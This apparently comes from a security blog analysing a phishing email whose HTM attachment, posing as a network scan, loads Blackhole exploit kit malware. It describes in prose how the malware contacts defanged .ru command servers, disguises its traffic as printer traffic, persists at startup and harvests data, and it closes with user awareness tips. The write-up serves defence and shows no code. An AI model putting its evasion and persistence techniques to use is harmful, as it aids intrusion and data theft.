The Blackhole Moves In Closer
The body gives little info about what's attached other than a scan, the number of pages, and the sender. These are all things you'd expect to see from a scan sent via the network, although the attachment is suspect. Normally you would expect to receive these images in something such as a PDF format. This one arrives as an HTM file. Once executed, the page launches locally, and victim's would see the page open in their browser that looked like this -
Meanwhile beneath the surface, their browser was interpreting this -
The malware attempts to make a connection to the domain cserimankra[dot]ru on port 8080 to download another script from /images/aublbzdni.php. If the destination is unreachable, the malware will begin to ping the domain stopbadware.org in order to establish whether or not it has connectivity to the web. Additionally, the malware makes all of its requests through port 1063 which is commonly used for the KyoceraNetDev protocol, which makes it look like normal network printer share traffic. Granted, it's Kyocera traffic and not HP traffic like it shows in the email, but still a pretty good way to hide its tracks a bit.
If allowed to connect to its command and control server, it downloads and creates a file by the name of gsxohsapcpklkti[dot]exe. This executable copies itself to Windows start-up areas where it's sure to run every time the victim PC is started, and begins pulling other exploit code packages from the sites samaragotodokns[dot]ru, hmvmgywkvayilcwh[dot]ru, and xvmzegestulhtvqz[dot]ru. After several files are created, run, hidden and deleted, the malware actively begins monitoring the victim's machine for sensitive information.
We have these variants blocked, but stay on your toes, and watch out for attacks such as these. Look for vague information, poor graphics, improper or even convincing attachments and links, and anything that may be out of place. Note that these emails appeared to have come from within the recipients' domain. This tactic is used a lot to lead potential victims into a false sense of security, don't let them fool you, and keep it safe out there!